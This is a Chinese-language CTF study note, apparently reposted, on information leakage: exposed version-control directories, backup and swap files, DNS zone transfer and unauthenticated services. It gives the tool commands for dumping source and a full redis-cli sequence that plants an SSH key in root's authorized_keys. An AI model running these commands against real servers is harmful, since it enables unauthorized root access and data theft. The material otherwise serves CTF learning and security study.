CTF之信息泄漏


web源碼泄漏

.hg源碼泄漏:

漏洞成因:hg  init的時候會生成.hg,http://www.xx.com/.hg/,

工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/)

 

.git源碼泄漏:

漏洞成因:在運行git init初始化代碼庫的時候,會在當前目錄下產生一個.git的隱藏文件,用來記錄代碼的變更記錄等,沒有刪除這個文件,導致泄漏,http://www.xxx.com/.git/config

工具:GitHack,dvcs-ripper,(GitHack.py http://www.xxx.com/.git,rip-hg.pl -v -u http://www.xx.com/.git/)

 

.DS_Store源碼泄漏:

漏洞成因:在發布代碼時,沒有刪除文件夾中隱藏的.DS_store,被發現后,獲取了敏感的文件名等信息,http://www.xxx.com/.ds_store

工具:dsstoreexp,(python ds_store_exp.py http://www.xxx.com/.DS_Store)

 

網站備份壓縮文件:

在網站的使用過程中,往往需要對網站中的文件進行修改,升級,此時就需要對網站整或其中某一頁面進行備份,當備份文件或修改過程中的緩存文件因為各種原因被留在網站web目錄下,而該目錄又沒有設置訪問權限,就有可能導致備份文件被下載,導致信息泄漏,給服務器安全埋下隱患。.rar, .zip, .7z, .tar.gz, .bak, .swp, .txt, .html,

工具:可以使用一些掃描軟件,進行掃描,如awvs之類的

像.swp文件,就是vim源文件泄漏,/.index.php.swp或/index.php~ 可以直接用vim -r inde.php來讀取文件

 

SVN導致文件泄漏:

版本控制系統

工具:dvcs-ripper,Seay-Svn,(rip-svn.pl -v -u http://www.xxx.com/.svn/)

 

 

 

 

應用層泄漏

DNS域傳送:

dns服務器的主備數據同步,使用的是域傳送功能,如果使用默認配置文件進行配置,就會存在dns域傳送漏洞(不手動添加allow-transfer)

工具:dig @1.1.1.1 xxx.com axfr (會泄漏一些信息)

 

HeartBleed:

利用https

 

從堆棧錯誤泄漏到RCE:

利用報錯,泄漏信息,利用函數try{....}catche(e){e.printstack;}

 

未授權訪問漏洞:

未授權訪問----應用層服務的問題,服務啟動后,沒配置任何憑證,導致可以直接進入

弱口令---配置的密碼過於簡單常見

空口令---沒配置密碼

目前主要存在未授權訪問漏洞的如下:

NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,Redis,ZooKeeper,

ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等,這些都是挖礦勒索的高發地帶

 

如:

redis為授權訪問漏洞,默認情況下會綁定在0.0.0.0:6379,這樣會將redis服務暴露到公網上,如果沒有開啟認證的情況下,可以導致任意用戶可以訪問目標服務器,可以利用相關方法,在redis服務器上寫入公鑰,進而可以使用對應私鑰直接登陸目標服務器。

1.本地生成公鑰私鑰

ssh-keygen -t rsa

2.把公鑰寫入xx.txt文件

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > xx.txt

3.連接redis寫入文件

cat xx.txt | redis-cli -h 192.168.1.2 -x set crackit

redis-cli -h 192.168.1.2

192.168.1.2:6379> config set dir /root/.ssh/

192.168.1.2:6379> config get dir

1)"dir"

2)"/root/.ssh"

192.168.1.2:6379> config set dbfilename "authorized_keys"

192.168.1.2"6379> save

 

也可以使用msf里面成熟的exp來利用

 

 

 

 

友情鏈接  http://www.cnblogs.com/klionsec

                http://www.cnblogs.com/l0cm

                http://www.cnblogs.com/Anonyaptxxx

                http://www.feiyusafe.cn

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM